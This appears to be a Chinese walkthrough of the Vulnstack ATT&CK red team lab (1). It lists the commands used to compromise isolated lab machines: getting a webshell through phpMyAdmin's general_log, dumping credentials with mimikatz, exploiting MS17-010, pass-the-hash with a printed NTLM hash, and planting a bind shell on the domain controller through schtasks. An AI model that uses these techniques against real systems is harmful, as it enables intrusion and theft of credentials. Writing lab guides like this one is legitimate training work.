ATT&CK红队评估实战靶场(一)

靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
攻击拓扑如下
ATT&CK红队评估实战靶场(一)_第1张图片

0x01环境搭建
配置两卡,仅主机模式192.168.52.0网段模拟内网,192.168.72.0网段模拟外网
Kali linux IP 192.168.72.131
win7 IP 192.168.72.130/192.168.52.143
win2003 IP 192.168.72.141
DC 2008 IP 192.168.52.138

0X02信息收集
用nmap找到外网IP地址
netdiscover -i eth0 -r 192.168.72.0/24
ATT&CK红队评估实战靶场(一)_第2张图片
御剑扫目录扫到后台
扫到目录http://192.168.72.130/phpmyadmin/
弱口令root /root进入后台

0x03phpmyadmin后台getshell
show variables like '%general%'; #查看日志状态
ATT&CK红队评估实战靶场(一)_第3张图片
SET GLOBAL general_log='on'
ATT&CK红队评估实战靶场(一)_第4张图片
SET GLOBAL general_log_file='C:/phpStudy/www/233.php' 设置路径
ATT&CK红队评估实战靶场(一)_第5张图片
SELECT ' ' //写入一句话木马
ATT&CK红队评估实战靶场(一)_第6张图片
getshell
http://192.168.72.130/233.php
ATT&CK红队评估实战靶场(一)_第7张图片

0x04权限提升
直接用Cs的脚本ms14-068提权
ATT&CK红队评估实战靶场(一)_第8张图片

0x05内网信息收集
把webshell转换成cs上线
ATT&CK红队评估实战靶场(一)_第9张图片
ipconfig /all
ATT&CK红队评估实战靶场(一)_第10张图片
hashdump看一下密码
ATT&CK红队评估实战靶场(一)_第11张图片
再用mimikatz抓一下明文密码,抓到hongrisec@2020
ATT&CK红队评估实战靶场(一)_第12张图片
shell net user /domain
查看域内用户
使用lodan扫描内网网络
ATT&CK红队评估实战靶场(一)_第13张图片
使用lazagone.exe 抓取本机所有密码
ATT&CK红队评估实战靶场(一)_第14张图片
抓到了很多win7机器上的密码
ATT&CK红队评估实战靶场(一)_第15张图片
用Msf的这个模块可以判断目标机器上面装了那些软件
run post/windows/gather/enum_applications 使用这个之后发现win7(双网卡机器)上有一个现成的nmap
直接用beacon下的nmap去扫描DC的漏洞 shell nmap --script=vuln 192.168.52.138 发现域控存在ms17-010
ATT&CK红队评估实战靶场(一)_第16张图片
ATT&CK红队评估实战靶场(一)_第17张图片
这里其实已经可以直接去用Msf打域控的17010了

0x06MSF与CS联动
新启一个监听,用foriereverse_tcp,然后msf开始监听端口,成功转接cs的shell
ATT&CK红队评估实战靶场(一)_第18张图片
查看当前网段并添加路由
ATT&CK红队评估实战靶场(一)_第19张图片

0x07配置msf代理
ATT&CK红队评估实战靶场(一)_第20张图片
之前扫描的是DC,先看一下2003有没有漏洞,扫一下141,其实不挂代理也行,win7里面有一个Nmap,这里要注意socks代理不支持icmp协议
proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms17-010.nse 192.168.52.141
ATT&CK红队评估实战靶场(一)_第21张图片

0x08两种拿下2003
因为已经知道了漏洞,直接永恒之蓝打过去了
ATT&CK红队评估实战靶场(一)_第22张图片
PTH方法
选择之前生成的那个smb beacon 然后在用哈希传递的方法,域内管理员的账号直接登录
ATT&CK红队评估实战靶场(一)_第23张图片
ATT&CK红队评估实战靶场(一)_第24张图片
192.168.52.141成功上线
ATT&CK红队评估实战靶场(一)_第25张图片

0x09票据+计划任务拿DC
mimikatz sekurlsa::pth /domain:god.org /user:administrator /ntlm:81be2f80d568100549beac645d6a7141
ATT&CK红队评估实战靶场(一)_第26张图片
shell dir \192.168.52.138\c$ //dir DC的目录
ATT&CK红队评估实战靶场(一)_第27张图片
生成一个exe马
这里用windows/reverse_bind_tcp LHOST=0.0.0.0 LPORT=7777 生成正向的马 yukong.exe
把马复制到域控机器上shell copy C:\yukong.exe \192.168.52.138\c$
然后再用这个写入计划任务的方法去连接,这里马反弹会连不成功,所以
shell schtasks /create /tn "test" /tr C:\yukong.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "hongrisec@2020"
挂着win7代理 proxy nc -vv 192.168.52.138 7777 即可弹回DC138的shell
用Meterpreter的马也可以,之前失败了,后续还是改成meterpreter的马,或者把普通shell再升级成meterpreter再导入cs也可以
马上线之后清除计划任务schtasks /delete /s 192.168.52.138 /tn "test" /f

本靶场有很多地方都可以打成功,可以自己尝试一下。

你可能感兴趣的:(ATT&CK红队评估实战靶场(一))